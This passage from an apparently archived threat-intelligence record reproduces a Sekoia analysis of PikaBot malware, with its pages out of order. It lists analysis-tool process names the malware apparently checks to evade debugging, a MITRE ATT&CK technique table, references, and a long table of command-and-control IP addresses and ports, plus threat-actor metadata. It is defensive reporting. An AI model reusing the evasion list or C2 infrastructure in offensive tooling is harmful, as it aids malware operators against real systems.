\r\ndumpcap.exe\r\nHookExplorer.exe\r\nImportREC.exe\r\nidaq.exe\r\nidaq64.exe\r\nlldbg.exe\r\nProcessHacker.exe\r\ntcpview.exe\r\nautoruns.exe\r\nautorunsc.exe\r\nfilemon.exe\r\nprocmon.exe\r\nregmon.exe\r\nprocessxp.exe\r\nMITRE ATT\u0026CK TTPs\r\nTactic Technique\r\nCommand and\r\nControl\r\nT1071.001 – Application Layer Protocol: Web Protocols\r\nCommand and\r\nControl\r\nT1573.001 – Encrypted Channel: Symmetric Cryptography\r\nCommand and\r\nControl\r\nT1041 – Exfiltration Over C2 Channel\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 36 of 38\n\nCommand and\r\nControl\r\nT1571 – Non-Standard Port\r\nDefense Evasion T1497.001 – Virtualization/Sandbox Evasion: System Checks\r\nDefense Evasion T1140 – Deobfuscate/Decode Files or Information\r\nDefense Evasion T1027.007 – Obfuscated Files or Information: Dynamic API Resolution\r\nDefense evasion T1622 – Debugger evasion\r\nDefense Evasion T1497.003 – Virtualization/Sandbox Evasion: Time Based Evasion\r\nDiscovery T1087.002 – Account Discovery: Domain Account\r\nDiscovery T1016 – System Network Configuration Discovery\r\nDiscovery T1057 – Process Discovery\r\nDiscovery T1033 – System Owner/User Discovery\r\nDiscovery T1614.001 – System Location Discovery: System Language Discovery\r\nDiscovery T1482 – Domain Trust Discovery\r\nDiscovery T1083 – File and Directory Discovery\r\nDiscovery T1087.001 – Account Discovery: Local Account\r\nExecution T1106 – Native API\r\nExecution T1053 – Scheduled Task/Job: Scheduled Task\r\nExecution\r\nT1059.003 – Command and Scripting Interpreter: Windows Command\r\nShell\r\nExecution T1129 – Shared Modules\r\nPersistense\r\nT1547.001 – Boot or Logon Autostart Execution: Registry Run Keys /\r\nStartup Folder\r\nPrivilege Escalation T1055.002 – Process Injection: Portable Executable Injection\r\nPrivilege Escalation T1055.003 – Process Injection: Thread Execution Hijacking\r\nPrivilege Escalation T1055.003 – Process Injection: Process Hollowing\r\nTable 3. Mitre Att\u0026ck TTP of PikaBot\r\nExternal references\r\nhttps://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 37 of 38\n\nhttps://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\r\nhttps://twitter.com/Unit42_Intel/status/1623349272061136900\r\nhttps://twitter.com/1ZRR4H/status/1623600348060389376\r\nhttps://twitter.com/search?q=from%3A%40cryptolaemus1%20%22pikabot%22\u0026f=live\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nhttps://www.zscaler.com/blogs/security-research/technical-analysis-pikabot\r\nhttps://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls\r\nhttps://www.vmray.com/cyber-security-blog/why-your-edr-let-pikabot-jump-through/\r\nhttps://www.zscaler.com/blogs/security-research/d-evolution-pikabot\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you#obfuscation-c\r\nhttps://victorbush.com/2015/04/the-anti-rootkit-rootkit/\r\nhttps://blog.krakz.fr/notes/syswhispers2/\r\nhttps://www.elastic.co/security-labs/pikabot-i-choose-you\r\nhttps://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398\r\nThank you for reading this blogpost. We welcome any reaction, feedback or critics about this analysis. Please\r\ncontact us on tdr[at]sekoia.io.\r\nShare\r\nCybercrime Infrastructure Malware Reverse\r\nShare this post:\r\nSource: https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nhttps://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/\r\nPage 38 of 38\n\nThe list of IoCs IP address is available on Sekoia.io GitHub repository. Port Valid from Valid until\n172.234.250.178 2222 2024-05-06 2024-06-05\n20.67.206.46 443 2024-04-24 2024-05-24\n172.233.155.253 2078 2024-04-05 2024-04-22\n172.233.221.61 5938 2024-04-04 2024-05-10\n213.199.41.33 13721 2024-03-26 2024-05-16\n194.233.91.144 5000 2024-03-26 2024-05-16\n158.220.95.214 5243 2024-03-26 2024-05-08\n84.247.157.112 13783 2024-03-26 2024-05-16\n172.232.208.90 2223 2024-03-26 2024-05-05\n158.220.95.215 5242 2024-03-26 2024-05-03\n64.23.199.206 1194 2024-03-26 2024-05-03\n4.175.178.149 443 2024-03-23 2024-04-22\n70.34.199.64 9785 2024-03-06 2024-04-05\n45.77.63.237 5632 2024-03-06 2024-04-05\n94.72.104.77 13724 2024-03-06 2024-04-05\n154.53.55.165 13783 2024-03-06 2024-04-05\n198.38.94.213 2224 2024-03-06 2024-04-05\n154.12.236.248 13786 2024-03-06 2024-04-05\n94.72.104.80 5000 2024-03-06 2024-04-05\n209.126.86.48 1194 2024-03-06 2024-04-05\n158.247.240.58 5632 2024-03-06 2024-04-05\n70.34.223.164 5000 2024-03-06 2024-04-05\n  Page 21 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n84.46.240.42 2083 2024-03-05 2024-04-04\n65.20.73.169 13783 2024-03-01 2024-03-31\n65.20.69.208 5000 2024-03-01 2024-03-31\n23.226.138.143 2083 2024-02-29 2024-03-30\n192.248.159.76 2222 2024-02-29 2024-03-30\n54.84.110.180 443 2024-02-21 2024-03-22\n45.32.204.175 2222 2024-02-20 2024-03-21\n45.77.55.133 2078 2024-02-20 2024-03-21\n154.38.175.241 13721 2024-02-19 2024-03-23\n154.12.248.41 5000 2024-02-19 2024-03-23\n154.12.233.66 2224 2024-02-19 2024-03-30\n148.113.141.220 2224 2024-02-19 2024-03-23\n89.117.23.186 5632 2024-02-19 2024-03-30\n57.128.165.176 13721 2024-02-19 2024-03-30\n145.239.135.24 5243 2024-02-19 2024-03-30\n109.199.99.131 13721 2024-02-19 2024-03-23\n141.95.106.106 2967 2024-02-19 2024-03-23\n89.117.23.34 5938 2024-02-19 2024-03-23\n89.117.23.185 2221 2024-02-19 2024-03-30\n172.232.190.57 2224 2024-02-17 2024-03-23\n185.179.217.216 9785 2024-02-16 2024-03-23\n172.232.174.6 5242 2024-02-16 2024-03-23\n172.232.186.100 2083 2024-02-15 2024-03-23\n86.38.225.109 13724 2024-02-14 2024-03-21\n131.153.231.178 2221 2024-02-14 2024-03-20\n45.32.21.184 5242 2024-02-14 2024-03-20\n104.156.233.235 2226 2024-02-14 2024-03-21\n  Page 22 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n95.179.135.3 2225 2024-02-14 2024-03-20\n198.44.187.12 2224 2024-02-14 2024-03-23\n155.138.147.62 2223 2024-02-14 2024-03-20\n154.201.81.8 2967 2024-02-14 2024-03-15\n108.61.78.17 13783 2024-02-14 2024-03-20\n172.232.189.219 2224 2024-02-14 2024-03-23\n172.232.162.97 13783 2024-02-14 2024-03-23\n172.232.189.10 1194 2024-02-14 2024-03-23\n43.229.78.74 2226 2024-02-14 2024-03-15\n104.129.55.106 13783 2024-02-13 2024-03-30\n45.76.251.190 5631 2024-02-13 2024-03-21\n103.82.243.5 13785 2024-02-13 2024-03-30\n104.129.55.105 2223 2024-02-13 2024-03-30\n45.32.248.100 2226 2024-02-13 2024-03-21\n86.38.225.105 13721 2024-02-12 2024-03-30\n86.38.225.106 2221 2024-02-12 2024-03-30\n86.38.225.108 2226 2024-02-12 2024-03-19\n37.60.242.86 2967 2024-02-09 2024-03-23\n178.18.246.136 2078 2024-02-09 2024-03-30\n23.226.138.161 5242 2024-02-09 2024-03-23\n85.239.243.155 5000 2024-02-08 2024-03-30\n139.84.237.229 2967 2024-02-08 2024-03-15\n95.179.191.137 5938 2024-02-08 2024-03-15\n158.220.80.157 9785 2024-02-08 2024-03-15\n158.220.80.167 2967 2024-02-08 2024-03-15\n65.20.66.218 5938 2024-02-08 2024-03-15\n37.60.242.85 9785 2024-02-08 2024-03-30\n  Page 23 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n104.129.55.103 2224 2024-02-08 2024-03-15\n104.129.55.104 2223 2024-02-08 2024-03-15\n78.47.233.121 443 2024-01-24 2024-02-23\n109.123.227.104 2221 2024-01-23 2024-03-17\n139.180.185.171 2222 2024-01-23 2024-03-17\n192.248.174.52 5631 2024-01-23 2024-03-17\n154.38.184.3 2223 2024-01-23 2024-03-17\n85.239.243.3 23399 2023-12-23 2024-01-29\n109.123.227.158 2223 2023-12-21 2024-01-29\n109.123.227.174 23399 2023-12-21 2024-01-29\n85.239.237.153 5632 2023-12-21 2024-01-28\n172.234.224.202 13785 2023-12-21 2024-01-20\n5.180.151.180 2224 2023-12-21 2024-01-29\n5.180.151.194 5631 2023-12-21 2024-01-29\n109.123.227.167 5938 2023-12-21 2024-01-29\n172.232.172.228 2221 2023-12-21 2024-01-20\n172.232.189.141 2078 2023-12-21 2024-01-20\n109.123.227.170 5632 2023-12-21 2024-01-29\n172.232.172.171 13721 2023-12-21 2024-01-20\n154.38.164.50 5243 2023-12-21 2024-01-28\n109.123.227.147 5243 2023-12-21 2024-01-29\n109.123.227.166 5938 2023-12-21 2024-01-29\n172.232.7.224 9785 2023-12-21 2024-01-20\n185.187.235.158 23399 2023-12-20 2024-01-29\n172.232.189.134 2221 2023-12-20 2024-01-27\n65.20.78.70 2967 2023-12-20 2024-01-19\n139.180.137.30 5000 2023-12-20 2024-01-19\n  Page 24 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n172.232.161.248 13783 2023-12-20 2024-01-19\n107.191.56.230 13783 2023-12-20 2024-01-19\n89.117.55.179 2083 2023-12-20 2024-01-28\n216.128.179.120 2967 2023-12-20 2024-01-19\n216.128.151.26 13782 2023-12-20 2024-01-27\n172.232.162.62 2083 2023-12-20 2024-01-19\n46.250.253.58 5243 2023-12-20 2024-01-27\n178.154.205.14 443 2023-12-20 2024-01-19\n149.28.252.250 5000 2023-12-20 2024-01-27\n172.232.172.117 1194 2023-12-20 2024-01-19\n89.117.55.178 2083 2023-12-20 2024-01-28\n104.207.143.168 2222 2023-12-20 2024-01-27\n154.38.185.135 13782 2023-12-20 2024-01-27\n95.179.247.197 13782 2023-12-20 2024-01-19\n64.176.67.92 2078 2023-12-20 2024-01-19\n172.232.189.146 2078 2023-12-20 2024-01-19\n172.232.190.249 5631 2023-12-20 2024-01-19\n154.38.185.138 13786 2023-12-20 2024-01-28\n45.76.119.22 13724 2023-12-19 2024-01-18\n69.164.213.141 5631 2023-12-19 2024-01-18\n78.141.223.212 1194 2023-12-19 2024-01-25\n45.76.96.172 2223 2023-12-18 2024-01-25\n64.176.13.28 2083 2023-12-18 2024-01-25\n45.76.22.139 13786 2023-12-18 2024-01-25\n51.161.81.190 13721 2023-12-18 2024-02-29\n45.56.71.218 13724 2023-12-18 2024-01-26\n216.238.79.12 2221 2023-12-18 2024-01-25\n  Page 25 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n78.141.200.111 5938 2023-12-18 2024-01-25\n65.20.85.39 2967 2023-12-18 2024-01-25\n149.28.100.66 5243 2023-12-18 2024-01-25\n172.232.54.192 2224 2023-12-18 2024-01-26\n208.76.221.253 13724 2023-12-18 2024-01-25\n70.34.196.219 2226 2023-12-18 2024-01-25\n172.232.188.4 2226 2023-12-18 2024-01-26\n155.138.140.156 13720 2023-12-18 2024-01-25\n45.33.15.215 2967 2023-12-18 2024-01-26\n172.232.189.166 1194 2023-12-18 2024-01-26\n149.28.189.244 2222 2023-12-17 2024-01-23\n66.135.31.146 2078 2023-12-16 2024-01-15\n172.232.163.182 2222 2023-12-16 2024-01-23\n65.20.115.154 5243 2023-12-15 2024-01-22\n54.37.79.82 2223 2023-12-15 2024-01-21\n167.179.93.21 1194 2023-12-15 2024-01-22\n57.128.103.99 2078 2023-12-15 2024-01-21\n172.232.170.25 13724 2023-12-15 2024-01-23\n172.232.173.219 5938 2023-12-14 2024-01-22\n172.232.186.251 5632 2023-12-14 2024-01-23\n172.232.162.198 13721 2023-12-14 2024-01-23\n31.210.51.93 443 2023-12-14 2024-01-13\n149.28.17.176 1194 2023-12-13 2024-01-19\n172.232.163.208 2224 2023-12-13 2024-01-20\n172.232.164.77 5000 2023-12-13 2024-01-20\n64.176.66.137 5000 2023-12-13 2024-01-19\n64.176.68.223 13785 2023-12-13 2024-01-19\n  Page 26 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n107.191.47.85 5243 2023-12-13 2024-01-19\n172.232.163.111 5938 2023-12-13 2024-01-20\n172.232.175.59 5938 2023-12-13 2024-01-20\n172.232.164.159 5632 2023-12-13 2024-01-20\n95.179.212.178 13782 2023-12-13 2024-01-19\n45.32.253.21 2083 2023-12-13 2024-01-19\n192.248.183.93 5632 2023-12-13 2024-01-19\n199.247.8.136 13786 2023-12-13 2024-01-19\n141.95.108.72 443 2023-12-12 2024-01-11\n155.138.203.158 1194 2023-12-11 2024-03-17\n65.20.98.24 13783 2023-12-11 2024-03-17\n65.20.82.254 5243 2023-12-11 2024-03-17\n109.123.227.54 13785 2023-12-11 2024-01-18\n154.38.184.5 9785 2023-12-11 2024-01-18\n66.42.80.169 5631 2023-12-11 2024-01-18\n109.123.227.50 13782 2023-12-11 2024-01-18\n158.220.90.199 2083 2023-12-09 2024-01-18\n45.137.192.63 23399 2023-12-08 2024-01-17\n31.220.96.162 2224 2023-12-08 2024-01-18\n161.97.98.95 2083 2023-12-08 2024-01-17\n158.220.103.150 5632 2023-12-08 2024-01-17\n45.32.188.56 2967 2023-12-07 2024-01-06\n192.248.151.140 23399 2023-12-07 2024-01-06\n64.176.225.21 2225 2023-12-07 2024-01-14\n45.137.192.84 2223 2023-12-07 2024-01-17\n45.32.235.46 5242 2023-12-07 2024-01-06\n70.34.207.219 5000 2023-12-07 2024-01-06\n  Page 27 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n139.84.235.8 2225 2023-12-07 2024-01-06\n64.176.218.254 9785 2023-12-07 2024-01-14\n46.250.241.191 13721 2023-12-07 2024-01-15\n216.128.136.231 13786 2023-12-07 2024-01-06\n108.61.224.209 2967 2023-12-07 2024-01-06\n46.250.241.197 5000 2023-12-07 2024-01-15\n65.20.74.26 2221 2023-12-07 2024-01-14\n158.220.90.198 2083 2023-12-07 2024-01-18\n65.20.77.81 5242 2023-12-06 2024-01-05\n207.148.103.233 2967 2023-12-06 2024-01-05\n199.247.15.68 5938 2023-12-06 2024-01-13\n78.141.222.198 13786 2023-12-06 2024-01-05\n45.63.26.148 2224 2023-12-06 2024-01-05\n57.128.83.129 2078 2023-12-01 2024-01-21\n45.76.98.136 2221 2023-12-01 2024-01-22\n154.211.12.126 2967 2023-12-01 2024-02-05\n141.95.108.252 2078 2023-12-01 2024-01-21\n57.128.109.221 13724 2023-12-01 2024-01-21\n57.128.164.11 5242 2023-12-01 2024-01-21\n139.99.222.29 5631 2023-12-01 2024-01-14\n57.128.108.132 13785 2023-12-01 2024-01-21\n172.232.173.141 2226 2023-12-01 2024-01-23\n51.83.253.102 9785 2023-12-01 2024-01-21\n46.250.241.188 1194 2023-11-18 2023-12-25\n207.148.93.23 2221 2023-11-17 2023-12-24\n64.176.190.166 2222 2023-11-17 2023-12-24\n45.32.244.94 9785 2023-11-17 2023-12-24\n  Page 28 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n155.138.132.163 13786 2023-11-15 2023-12-21\n158.247.196.155 9785 2023-11-15 2023-12-21\n45.32.232.31 13782 2023-11-15 2023-12-21\n45.33.69.35 5242 2023-11-15 2023-12-22\n172.232.189.83 5243 2023-11-15 2023-12-25\n97.107.131.224 13782 2023-11-15 2023-12-25\n172.232.189.84 23399 2023-11-15 2023-12-22\n70.34.223.131 5938 2023-11-13 2023-12-19\n139.180.168.216 13786 2023-11-13 2023-12-20\n95.179.182.147 2078 2023-11-13 2023-11-23\n167.179.100.211 2221 2023-11-13 2023-12-21\n95.179.214.49 5242 2023-11-13 2023-12-20\n70.34.242.159 5243 2023-11-13 2023-12-20\n154.12.255.254 23399 2023-11-09 2023-12-17\n65.20.77.19 5242 2023-11-09 2023-12-16\n158.247.215.68 2225 2023-11-09 2023-12-16\n95.179.206.77 13782 2023-11-09 2023-12-16\n217.69.14.55 13724 2023-11-09 2023-12-16\n149.28.49.170 23399 2023-11-09 2023-12-16\n158.247.246.182 2226 2023-11-07 2023-12-14\n158.247.197.73 23399 2023-11-06 2023-12-06\n104.238.144.171 2221 2023-11-06 2023-12-06\n136.244.98.80 13783 2023-11-06 2023-12-14\n198.13.58.126 2223 2023-11-06 2023-12-06\n45.76.103.152 13720 2023-11-06 2023-12-19\n65.20.84.3 2221 2023-11-06 2023-12-06\n149.248.53.65 2221 2023-11-06 2023-12-14\n  Page 29 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n65.20.84.254 13783 2023-11-06 2023-12-06\n207.246.111.127 13786 2023-11-06 2023-12-14\n158.247.202.180 13783 2023-11-06 2023-12-06\n95.179.141.41 1194 2023-11-04 2023-12-10\n167.179.103.206 2083 2023-11-03 2023-12-09\n45.32.140.39 2078 2023-11-03 2023-12-09\n45.33.85.73 13721 2023-11-01 2023-12-08\n172.233.154.98 13785 2023-11-01 2023-12-08\n172.233.185.220 5242 2023-11-01 2023-12-08\n104.237.145.83 2083 2023-11-01 2023-12-08\n50.116.54.138 13724 2023-10-31 2023-12-08\n51.68.144.135 2083 2023-10-31 2023-12-08\n140.82.56.164 5632 2023-10-31 2023-11-30\n139.144.97.180 2224 2023-10-31 2023-11-30\n104.200.28.75 2222 2023-10-30 2023-12-08\n202.182.121.203 2083 2023-10-30 2023-11-29\n65.20.82.17 5938 2023-10-30 2023-12-06\n158.247.210.203 2222 2023-10-30 2023-11-29\n172.234.16.175 2083 2023-10-30 2023-12-06\n185.106.94.167 5631 2023-10-28 2023-12-05\n45.79.174.92 1194 2023-10-28 2023-12-05\n139.144.31.103 1194 2023-10-28 2023-12-04\n216.128.176.211 2222 2023-10-27 2023-12-04\n172.234.29.13 2224 2023-10-24 2023-12-01\n198.244.141.4 9785 2023-10-24 2023-12-03\n172.233.187.145 2226 2023-10-24 2023-12-02\n139.144.215.192 13785 2023-10-24 2023-11-30\n  Page 30 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n172.233.186.50 5632 2023-10-24 2023-11-30\n45.33.76.163 2223 2023-10-24 2023-12-01\n45.79.147.119 9785 2023-10-24 2023-12-01\n172.232.188.124 2083 2023-10-24 2023-11-23\n217.69.8.229 13782 2023-10-24 2023-11-30\n139.177.198.199 2226 2023-10-24 2023-12-02\n172.232.24.58 2226 2023-10-24 2023-11-30\n176.58.102.36 2225 2023-10-24 2023-11-30\n15.235.143.190 2224 2023-10-23 2023-12-06\n85.215.218.128 5243 2023-10-23 2023-11-29\n103.231.93.15 5631 2023-10-23 2023-12-03\n155.138.156.94 5243 2023-10-23 2023-11-29\n154.12.252.84 23399 2023-10-23 2023-12-18\n196.218.123.202 13783 2023-10-23 2024-03-23\n156.251.137.134 5000 2023-10-23 2023-11-29\n51.68.146.19 5242 2023-10-23 2023-12-06\n139.99.216.90 13720 2023-10-23 2023-12-06\n34.135.79.247 443 2023-10-21 2023-11-20\n109.107.182.12 443 2023-10-20 2023-11-19\n109.107.182.13 443 2023-10-20 2023-11-19\n109.107.182.17 443 2023-10-20 2023-11-19\n109.107.182.18 443 2023-10-20 2023-11-19\n109.107.182.15 443 2023-10-20 2023-11-19\n109.107.182.14 443 2023-10-20 2023-11-19\n109.107.182.16 443 2023-10-20 2023-11-19\n109.107.182.10 443 2023-10-19 2023-11-26\n109.107.182.11 443 2023-10-19 2023-11-26\n  Page 31 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n109.107.182.19 443 2023-10-19 2023-11-18\n91.215.85.216 443 2023-10-18 2023-11-25\n91.215.85.154 443 2023-10-18 2023-11-25\n91.215.85.197 443 2023-10-18 2023-11-26\n85.106.94.167 5631 2023-10-17 2023-11-16\n185.106.94.177 13721 2023-10-17 2023-11-23\n185.106.94.152 13720 2023-10-17 2023-11-23\n80.85.140.43 9785 2023-10-17 2023-11-24\n80.85.140.152 5938 2023-10-11 2023-11-24\n78.128.112.208 443 2023-10-11 2023-11-24\n88.214.27.74 443 2023-10-11 2023-11-23\n185.106.94.174 5000 2023-10-11 2023-11-23\n45.182.189.105 443 2023-10-11 2023-11-23\n94.16.122.250 2078 2023-10-09 2023-10-19\n94.228.169.221 2083 2023-10-09 2023-10-19\n45.131.108.250 1194 2023-10-04 2023-11-03\n144.64.204.81 2078 2023-10-04 2023-11-03\n102.129.139.65 32999 2023-10-04 2023-11-12\n79.141.175.96 2078 2023-10-03 2023-11-02\n209.126.9.47 2078 2023-10-03 2023-11-02\n167.86.96.3 2222 2023-10-03 2023-11-02\n38.242.240.28 1194 2023-10-03 2023-11-13\n192.254.69.35 2078 2023-10-02 2023-10-12\n104.243.45.170 2222 2023-10-02 2023-10-12\n154.92.19.139 2222 2023-10-01 2024-01-14\n15.235.47.206 13783 2023-10-01 2023-12-08\n15.235.202.109 2226 2023-10-01 2023-12-08\n  Page 32 of 38 \n\n https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/  \n137.220.55.190 2223 2023-10-01 2023-12-27\n65.20.78.68 13721 2023-10-01 2023-12-21\n70.34.209.101 13720 2023-10-01 2023-12-27\n158.247.253.155 2225 2023-10-01 2023-12-27\n15.235.45.155 2221 2023-10-01 2023-12-08\n15.235.47.80 23399 2023-10-01 2023-12-08\n64.176.67.194 2967 2023-10-01 2023-10-31\n51.68.147.114 2083 2023-10-01 2023-12-08\n154.221.30.136 13724 2023-10-01 2024-03-17\n64.176.5.228 13783 2023-10-01 2023-12-21\n210.243.8.247 23399 2023-10-01 2024-03-17\n51.79.143.215 13783 2023-10-01 2023-12-08\n51.195.232.97 13782 2023-10-01 2023-12-16\n154.61.75.156 2078 2023-10-01 2024-01-20\n139.180.216.25 2967 2023-10-01 2023-12-27\n172.233.156.100 13721 2023-10-01 2023-12-28\n188.26.127.4 13785 2023-10-01 2023-12-09\n15.235.44.231 5938 2023-10-01 2023-12-08\n192.9.135.73 1194 2023-09-25 2024-03-23\n148.153.34.82 2078 2023-09-25 2023-11-29\n135.125.124.72 2078 2023-09-25 2023-11-06\n24.199.109.6 2222 2023-07-24 2023-08-10\n8.20.255.249 2078 2023-06-19 2023-08-24\n185.87.148.132 1194 2023-05-22 2023-06-21\n89.116.131.40 2222 2023-05-22 2023-06-21\n85.215.162.167 2078 2023-05-21 2023-07-06\n154.80.229.112 2078 2023-05-21 2023-07-06\n  Page 33 of 38",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/pikabot-a-guide-to-its-deep-secrets-and-operations/"
	],
	"report_names": [
		"pikabot-a-guide-to-its-deep-secrets-and-operations"
	],
	"threat_actors": [
		{
			"id": "d9b39228-0d9d-4c1e-8e39-2de986120060",
			"created_at": "2023-01-06T13:46:39.293127Z",
			"updated_at": "2026-04-10T02:00:03.277123Z",
			"deleted_at": null,
			"main_name": "BelialDemon",
			"aliases": [
				"Matanbuchus"
			],
			"source_name": "MISPGALAXY:BelialDemon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b4f83fef-38ee-4228-9d27-dde8afece1cb",
			"created_at": "2023-02-15T02:01:49.569611Z",
			"updated_at": "2026-04-10T02:00:03.351659Z",
			"deleted_at": null,
			"main_name": "TA577",
			"aliases": [
				"Hive0118"
			],
			"source_name": "MISPGALAXY:TA577",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "22d450bb-fc7a-42af-9430-08887f0abf9f",
			"created_at": "2024-11-01T02:00:52.560354Z",
			"updated_at": "2026-04-10T02:00:05.276856Z",
			"deleted_at": null,
			"main_name": "TA577",
			"aliases": [
				"TA577"
			],
			"source_name": "MITRE:TA577",
			"tools": [
				"Pikabot",
				"QakBot",
				"Latrodectus"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434400,
	"ts_updated_at": 1775792010,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f5652518458409da22148a2e2733c558aea9b10.pdf",
		"text": "https://archive.orkl.eu/4f5652518458409da22148a2e2733c558aea9b10.txt",
		"img": "https://archive.orkl.eu/4f5652518458409da22148a2e2733c558aea9b10.jpg"
	}
}